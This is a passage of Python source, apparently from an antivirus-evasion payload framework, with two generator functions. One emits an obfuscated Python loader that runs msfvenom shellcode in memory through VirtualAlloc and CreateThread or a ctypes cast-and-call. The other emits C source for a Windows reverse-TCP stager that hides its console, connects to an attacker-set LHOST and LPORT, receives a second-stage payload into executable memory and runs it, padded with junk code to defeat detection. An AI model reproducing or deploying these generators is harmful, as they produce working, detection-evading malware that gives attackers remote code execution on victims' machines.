		VirtualAlloc/RtlMoveMemory/CreateThread loader ("virtual") and a
		create_string_buffer + CFUNCTYPE cast-and-call loader (anything else).
		``self.required_options["use_pyherion"]`` optionally wraps the result
		with ``crypters.pyherion``.  Returns the generated Python source as a
		str.  Python 2 only (``string.maketrans``, ``str.encode("string_escape")``).
		"""
		#Random letter substition variables
		hex_letters = "abcdef"
		# 'x' is deliberately absent from this alphabet -- presumably so the
		# "\x" escape prefixes in the escaped shellcode survive the substitution
		non_hex_letters = "ghijklmnopqrstuvwyz"
		encode_with_this = random.choice(hex_letters)
		decode_with_this = random.choice(non_hex_letters)

		# Generate Shellcode Using msfvenom
		Shellcode = self.shellcode.generate()

		# Generate Random Variable Names
		subbed_shellcode_variable_name = randomizer.randomString()
		shellcode_variable_name = randomizer.randomString()
		rand_ptr = randomizer.randomString()
		rand_buf = randomizer.randomString()
		rand_ht = randomizer.randomString()
		rand_decoded_letter = randomizer.randomString()
		rand_correct_letter = randomizer.randomString()
		rand_sub_scheme = randomizer.randomString()

		# Create Letter Substitution Scheme: maps the chosen hex letter to the
		# chosen non-hex letter (the emitted loader builds the reverse table)
		sub_scheme = string.maketrans(encode_with_this, decode_with_this)

		# Escaping Shellcode: turn raw bytes into a "\xNN"-style Python literal
		Shellcode = Shellcode.encode("string_escape")

		if self.required_options["inject_method"][0].lower() == "virtual":

			# Create Payload File: VirtualAlloc / RtlMoveMemory / CreateThread loader
			payload_code = 'import ctypes\n'
			payload_code += 'from string import maketrans\n'
			payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
			payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
			payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
			payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
			payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
			payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
			payload_code += rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
			payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
			payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
			payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
			payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'

			# optionally wrap the loader with the pyherion crypter
			if self.required_options["use_pyherion"][0].lower() == "y":
				payload_code = crypters.pyherion(payload_code)
			
			return payload_code

		else:
			
			#Additional random variable names
			# NOTE(review): rand_reverse_shell is assigned but never used in the
			# emitted code; the call still consumes one randomizer draw
			rand_reverse_shell = randomizer.randomString()
			rand_memory_shell = randomizer.randomString()
			rand_shellcode = randomizer.randomString()

			# Create Payload File: create_string_buffer + CFUNCTYPE cast-and-call loader
			payload_code = 'from ctypes import *\n'
			payload_code += 'from string import maketrans\n'
			payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
			payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
			payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
			payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
			payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
			payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
			payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
			payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
			# NOTE(review): unlike every other emitted line, this one has no trailing "\n"
			payload_code += rand_shellcode + '()'
    
			# optionally wrap the loader with the pyherion crypter
			if self.required_options["use_pyherion"][0].lower() == "y":
				payload_code = crypters.pyherion(payload_code)

			return payload_code
Example #31
    def generate(self):
        """Emit the C source of a Windows reverse-TCP stager, with filler code.

        The generated program hides its console window, initialises Winsock,
        connects to ``self.required_options["LHOST"]``/``["LPORT"]``, reads a
        4-byte length followed by that many bytes into a
        ``PAGE_EXECUTE_READWRITE`` buffer obtained from ``VirtualAlloc``, and
        calls the buffer as a function.  Interleaved with that are randomly
        named string-manipulation functions, fake ``#include`` lines and
        ``malloc``/``strcpy`` loops that do not contribute to the result.

        All identifiers come from ``randomizer.randomString``, numeric
        literals are rewritten by ``helpers.obfuscateNum`` (presumably to an
        expression evaluating to the same value), and ``random`` is used for
        shuffling and sizing.  Because every one of those calls advances the
        RNG, the output is only reproducible for a fixed call order.  Returns
        the C source as a single str.  Python 2 only (``xrange``, ``/``
        integer division).
        """

        winsock_init_name = randomizer.randomString()
        punt_name = randomizer.randomString()
        recv_all_name = randomizer.randomString()
        wsconnect_name = randomizer.randomString()

        # the real includes needed
        includes = [
            "#include <stdio.h>", "#include <stdlib.h>",
            "#include <windows.h>", "#include <string.h>"
        ]

        # max length string for obfuscation
        global_max_string_length = 10000
        max_string_length = random.randint(1, global_max_string_length)
        max_num_strings = 10000

        # TODO: add in more string processing functions
        randName1 = randomizer.randomString()  # reverse()
        randName2 = randomizer.randomString()  # doubles characters
        # (name, C source) pairs; shuffled so either may be referenced first
        stringModFunctions = [
            (randName1,
             "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }"
             % (randName1)),
            (randName2,
             "char* %s(char* s){ char *result =  malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }"
             % (randName2))
        ]

        random.shuffle(stringModFunctions)

        # obfuscation "logical nop" string generation functions
        # (randName1/randName2 are reused here for new, unrelated identifiers)
        randString1 = randomizer.randomString(50)
        randName1 = randomizer.randomString()
        randVar1 = randomizer.randomString()
        randName2 = randomizer.randomString()
        randVar2 = randomizer.randomString()
        randVar3 = randomizer.randomString()
        randName3 = randomizer.randomString()
        randVar4 = randomizer.randomString()
        randVar5 = randomizer.randomString()

        # three (name, C source) pairs; each calls one of the string mod
        # functions above or the Windows CRT strupr/strlwr.  The "/ 2" index
        # relies on Python 2 integer division.
        stringGenFunctions = [
            (randName1,
             "char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}"
             % (randName1, randVar1, stringModFunctions[0][0], randString1,
                randVar1, randString1[len(randString1) / 2])),
            (randName2,
             "char* %s(){ char %s[%s/2], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }"
             % (randName2, randVar2, max_string_length, randVar3,
                max_string_length, randVar2, randomizer.randomString(50),
                randVar3, randomizer.randomString(50),
                stringModFunctions[1][0], randVar2, randVar3)),
            (randName3,
             "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }"
             % (randName3, randVar4, max_string_length,
                randomizer.randomString(50), randVar5, randVar4, randVar5))
        ]
        random.shuffle(stringGenFunctions)

        # obfuscation - add in our fake includes
        fake_includes = [
            "#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>",
            "#include <signal.h>", "#include <stdarg.h>",
            "#include <limits.h>", "#include <assert.h>"
        ]
        # NOTE(review): t is never used, but the call still advances the RNG
        t = random.randint(1, 7)
        # the range starts at 1, so fake_includes[0] is never added and at most
        # six fake headers are appended (none when randint returns 1)
        for x in xrange(1, random.randint(1, 7)):
            includes.append(fake_includes[x])

        # shuffle up real/fake includes
        random.shuffle(includes)

        # winsock2.h is always emitted first, ahead of the shuffled includes
        code = "#define _WIN32_WINNT 0x0500\n"
        code += "#include <winsock2.h>\n"
        code += "\n".join(includes) + "\n"

        #string mod functions
        code += stringModFunctions[0][1] + "\n"
        code += stringModFunctions[1][1] + "\n"

        # build the winsock_init function: WSAStartup with a MAKEWORD built
        # from two obfuscated 2s; on failure, WSACleanup and exit(1)
        wVersionRequested_name = randomizer.randomString()
        wsaData_name = randomizer.randomString()
        code += "void %s() {" % (winsock_init_name)
        code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (
            wVersionRequested_name, helpers.obfuscateNum(
                2, 4), helpers.obfuscateNum(2, 4), wsaData_name)
        code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" % (
            wVersionRequested_name, wsaData_name)

        # first logical nop string function
        code += stringGenFunctions[0][1] + "\n"

        # build punt function: the error path (close socket, WSACleanup, exit(1))
        my_socket_name = randomizer.randomString()
        code += "void %s(SOCKET %s) {" % (punt_name, my_socket_name)
        code += "closesocket(%s);" % (my_socket_name)
        code += "WSACleanup();"
        code += "exit(1);}\n"

        # second logical nop string function
        code += stringGenFunctions[1][1] + "\n"

        # build recv_all function: loops recv() until len bytes have arrived,
        # calling punt on SOCKET_ERROR; the two fixed local names
        # (slfkmklsDSA, rcAmwSVM) are the only non-randomised identifiers
        my_socket_name = randomizer.randomString()
        buffer_name = randomizer.randomString()
        len_name = randomizer.randomString()
        code += "int %s(SOCKET %s, void * %s, int %s){" % (
            recv_all_name, my_socket_name, buffer_name, len_name)
        code += "int slfkmklsDSA=0;int rcAmwSVM=0;"
        code += "void * startb = %s;" % (buffer_name)
        code += "while (rcAmwSVM < %s) {" % (len_name)
        code += "slfkmklsDSA = recv(%s, (char *)startb, %s - rcAmwSVM, 0);" % (
            my_socket_name, len_name)
        code += "startb += slfkmklsDSA; rcAmwSVM   += slfkmklsDSA;"
        code += "if (slfkmklsDSA == SOCKET_ERROR) %s(%s);} return rcAmwSVM; }\n" % (
            punt_name, my_socket_name)

        # third logical nop string function
        code += stringGenFunctions[2][1] + "\n"

        # build wsconnect function: TCP socket, gethostbyname(LHOST),
        # connect to LHOST:LPORT (port literal obfuscated); punt on any failure
        target_name = randomizer.randomString()
        sock_name = randomizer.randomString()
        my_socket_name = randomizer.randomString()
        code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (
            wsconnect_name, target_name, sock_name, my_socket_name)
        code += "%s = socket(AF_INET, SOCK_STREAM, 0);" % (my_socket_name)
        code += "if (%s == INVALID_SOCKET) %s(%s);" % (
            my_socket_name, punt_name, my_socket_name)
        # LHOST is interpolated verbatim into a C string literal
        code += "%s = gethostbyname(\"%s\");" % (
            target_name, self.required_options["LHOST"][0])
        code += "if (%s == NULL) %s(%s);" % (target_name, punt_name,
                                             my_socket_name)
        code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" % (
            sock_name, target_name, target_name)
        code += "%s.sin_family = AF_INET;" % (sock_name)
        code += "%s.sin_port = htons(%s);" % (
            sock_name,
            helpers.obfuscateNum(int(self.required_options["LPORT"][0]), 32))
        code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" % (
            my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
        code += "return %s;}\n" % (my_socket_name)

        # build main() code
        size_name = randomizer.randomString()
        buffer_name = randomizer.randomString()
        function_name = randomizer.randomString()
        my_socket_name = randomizer.randomString()
        count_name = randomizer.randomString()

        # obfuscation stuff: three char* arrays of random length (up to
        # max_num_strings entries each), declared as VLAs inside main()
        char_array_name_1 = randomizer.randomString()
        number_of_strings_1 = random.randint(1, max_num_strings)
        char_array_name_2 = randomizer.randomString()
        number_of_strings_2 = random.randint(1, max_num_strings)
        char_array_name_3 = randomizer.randomString()
        number_of_strings_3 = random.randint(1, max_num_strings)

        # main(): hide the console window first
        code += "int main(int argc, char * argv[]) {"
        code += "ShowWindow( GetConsoleWindow(), SW_HIDE );"
        code += "ULONG32 %s;" % (size_name)
        code += "char * %s;" % (buffer_name)
        code += "int i;"
        code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
        code += "void (*%s)();" % (function_name)

        # malloc our first string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" % (
            number_of_strings_1, char_array_name_1,
            random.randint(max_string_length, global_max_string_length))

        # real code: Winsock init and connect
        code += "%s();" % (winsock_init_name)
        code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2)
        code += "SOCKET %s = %s();" % (my_socket_name, wsconnect_name)

        # malloc our second string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" % (
            number_of_strings_2, char_array_name_2,
            random.randint(max_string_length, global_max_string_length))

        # real code: read the 4-byte length prefix; punt unless exactly 4
        # bytes arrived and the length is positive
        code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (
            count_name, my_socket_name, size_name, helpers.obfuscateNum(4, 2))
        code += "if (%s != %s || %s <= 0) %s(%s);" % (
            count_name, helpers.obfuscateNum(
                4, 2), size_name, punt_name, my_socket_name)

        # real code: RWX buffer of length + 5 bytes
        code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" % (
            buffer_name, size_name, helpers.obfuscateNum(5, 2))
        code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)

        # first string obfuscation method
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
            number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])

        # real code: punt if the allocation failed, then write a one-byte
        # prefix (0xBF) followed by the 4-byte socket handle at the buffer start
        code += "if (%s == NULL) %s(%s);" % (buffer_name, punt_name,
                                             my_socket_name)
        code += "%s[0] = 0xBF;" % (buffer_name)
        code += "memcpy(%s + 1, &%s, %s);" % (buffer_name, my_socket_name,
                                              helpers.obfuscateNum(4, 2))

        # malloc our third string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" % (
            number_of_strings_3, char_array_name_3,
            random.randint(max_string_length, global_max_string_length))

        # second string obfuscation method
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
            number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])

        # real code: receive the body at offset 5, cast the buffer to a
        # function pointer and call it
        code += "%s = %s(%s, %s + %s, %s);" % (
            count_name, recv_all_name, my_socket_name, buffer_name,
            helpers.obfuscateNum(5, 2), size_name)
        code += "%s = (void (*)())%s;" % (function_name, buffer_name)
        code += "%s();" % (function_name)

        # third string obfuscation method (never called)
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
            number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])

        code += "return 0;}\n"

        return code